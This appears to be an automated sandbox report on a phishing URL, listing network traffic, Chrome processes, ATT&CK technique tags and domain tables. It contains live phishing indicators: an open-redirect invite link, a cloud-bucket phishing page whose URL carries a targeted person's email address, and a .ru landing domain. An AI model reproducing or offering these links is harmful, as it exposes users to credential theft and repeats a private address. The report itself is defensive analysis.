        Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: axelkirchhoffh.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: lumen.backerkit.com
        Source: global trafficDNS traffic detected: DNS query: rahul-garg-lcatterton-com.athuselevadores.com.br
        Source: global trafficDNS traffic detected: DNS query: ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: axelkirchhoffh.ru
        Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
        Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/602828571:1730216247:hU1JVbyKijtdUyJpcPx_11H0qSWFqnmCkoLtpOk75jI/8da452d5f8116bbc/Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXc HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3228sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXcsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonContent-Length: 41connection: closedate: Tue, 29 Oct 2024 15:50:53 GMTopc-request-id: xsp-1:TEoIqCdcbgJzYm6bLdYin61m1YSXles0uI8V0SWaJ6d4n38eLOIBHfQ2oCk_5B1ux-api-id: nativex-content-type-options: nosniffstrict-transport-security: max-age=31536000; includeSubDomainsaccess-control-allow-origin: *access-control-allow-methods: POST,PUT,GET,HEAD,DELETE,OPTIONSaccess-control-allow-credentials: trueaccess-control-expose-headers: access-control-allow-credentials,access-control-allow-methods,access-control-allow-origin,connection,content-length,content-type,date,opc-client-info,opc-request-id,strict-transport-security,x-api-id,x-content-type-options
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:50:55 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: xboKeHMZjUXSK7hhlHTx84KQi5FkhssMQvc=$JgMVAueO5SNyJDxPServer: cloudflareCF-RAY: 8da452f2cc3928d1-DFWalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:51:03 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: nkMUmMS6d42jwY2xeWWisEwCxXL5gu2ovEg=$s8TUNtJK5AissmSpServer: cloudflareCF-RAY: 8da453249879460c-DFWalt-svc: h3=":443"; ma=86400
        Source: chromecache_69.1.drString found in binary or memory: https://axelkirchhoffh.ru//
        Source: chromecache_69.1.drString found in binary or memory: https://axelkirchhoffh.ru//#contact
        Source: chromecache_69.1.drString found in binary or memory: https://axelkirchhoffh.ru//#inventory
        Source: chromecache_69.1.drString found in binary or memory: https://axelkirchhoffh.ru//#services
        Source: chromecache_69.1.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
        Source: chromecache_67.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
        Source: chromecache_69.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
        Source: chromecache_67.1.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js
        Source: chromecache_69.1.drString found in binary or memory: https://instagram.com/axelkirchhoffh.ru
        Source: chromecache_69.1.drString found in binary or memory: https://linkedin.com/in/axelkirchhoffh.ru
        Source: chromecache_69.1.drString found in binary or memory: https://x.com/axelkirchhoffh.ru
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49271 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49282 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49289
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49286
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49285
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49284
        Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49283
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49282
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49280
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49276
        Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49272
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49271
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49270
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49269
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49268
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49267
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49266
        Source: unknownNetwork traffic detected: HTTP traffic on port 49269 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49265
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49272 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49268 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49280 -> 443
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.16:49265 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49266 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49267 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49269 version: TLS 1.2
        Source: classification engineClassification label: mal52.phis.win@24/30@26/15
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8008:120:WilError_03
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1988,i,5379668934890043754,15086957964497128916,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1988,i,5379668934890043754,15086957964497128916,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dllJump to behavior
        Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected

        Persistence and Installation Behavior

        barindex
        Source: EmailJoeBoxAI: AI detected Brand spoofing attempt in URL: URL: https://lumen.backerkit.com/invites
        Source: EmailJoeBoxAI: AI detected Typosquatting in URL: URL: https://lumen.backerkit.com/invites
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid Accounts1
        Windows Management Instrumentation
        1
        Browser Extensions
        1
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Scripting
        1
        DLL Side-Loading
        1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        DLL Side-Loading
        1
        Registry Run Keys / Startup Folder
        1
        Deobfuscate/Decode Files or Information
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCron1
        Registry Run Keys / Startup Folder
        Login Hook1
        DLL Side-Loading
        NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544727 URL: https://lumen.backerkit.com... Startdate: 29/10/2024 Architecture: WINDOWS Score: 52 20 www.google.com 2->20 22 jsdelivr.map.fastly.net 2->22 24 4 other IPs or domains 2->24 38 Yara detected HtmlPhish70 2->38 40 AI detected suspicious URL 2->40 8 chrome.exe 9 2->8         started        11 chrome.exe 2->11         started        signatures3 process4 dnsIp5 26 192.168.2.14 unknown unknown 8->26 28 192.168.2.16, 138, 443, 49264 unknown unknown 8->28 30 239.255.255.250 unknown Reserved 8->30 13 chrome.exe 8->13         started        16 MpCmdRun.exe 1 11->16         started        process6 dnsIp7 32 lumen.backerkit.com 172.67.7.211, 443, 49698, 49699 CLOUDFLARENETUS United States 13->32 34 142.250.185.100, 443, 49283 GOOGLEUS United States 13->34 36 10 other IPs or domains 13->36 18 conhost.exe 16->18         started        process8

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css0%URL Reputationsafe
        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        jsdelivr.map.fastly.net
        151.101.129.229
        truefalse
          unknown
          ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com
          217.142.168.1
          truefalse
            unknown
            lumen.backerkit.com
            172.67.7.211
            truetrue
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                unknown
                challenges.cloudflare.com
                104.18.94.41
                truefalse
                  unknown
                  www.google.com
                  172.217.16.132
                  truefalse
                    unknown
                    rahul-garg-lcatterton-com.athuselevadores.com.br
                    107.161.183.172
                    truefalse
                      unknown
                      axelkirchhoffh.ru
                      188.114.97.3
                      truefalse
                        unknown
                        cdn.jsdelivr.net
                        unknown
                        unknownfalse
                          unknown
                          171.39.242.20.in-addr.arpa
                          unknown
                          unknownfalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/favicon.icofalse
                              unknown
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/602828571:1730216247:hU1JVbyKijtdUyJpcPx_11H0qSWFqnmCkoLtpOk75jI/8da452d5f8116bbc/Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXcfalse
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8da452d5f8116bbc/1730217053320/7BL7LlnT3QR8G8zfalse
                                  unknown
                                  https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/false
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8da452d5f8116bbc&lang=autofalse
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8da452d5f8116bbc/1730217053319/3a7453e024aa7751b589715d75a71c9ff23b8f410ff13e8e84dec337084828f4/8EZUA_4eRzju1Q0false
                                          unknown
                                          https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.html#9rahul@garg.lcatterton.comfalse
                                            unknown
                                            https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2false
                                              unknown
                                              https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2false
                                                unknown
                                                https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.brfalse
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                    unknown
                                                    https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.htmlfalse
                                                      unknown
                                                      https://axelkirchhoffh.ru//false
                                                        unknown
                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://challenges.cloudflare.com/turnstile/v0/g/f2bbd6738e15/api.jsfalse
                                                          unknown
                                                          https://rahul-garg-lcatterton-com.athuselevadores.com.br/false
                                                            unknown
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://cdn.jsdelivr.net/npm/bootstrapchromecache_69.1.drfalse
                                                              unknown
                                                              https://axelkirchhoffh.ru//#inventorychromecache_69.1.drfalse
                                                                unknown
                                                                https://axelkirchhoffh.ru//#contactchromecache_69.1.drfalse
                                                                  unknown
                                                                  https://x.com/axelkirchhoffh.ruchromecache_69.1.drfalse
                                                                    unknown
                                                                    https://axelkirchhoffh.ru//#serviceschromecache_69.1.drfalse
                                                                      unknown
                                                                      https://instagram.com/axelkirchhoffh.ruchromecache_69.1.drfalse
                                                                        unknown
                                                                        https://linkedin.com/in/axelkirchhoffh.ruchromecache_69.1.drfalse
                                                                          unknown
                                                                          https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.csschromecache_69.1.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.17.24.14
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          217.142.168.1
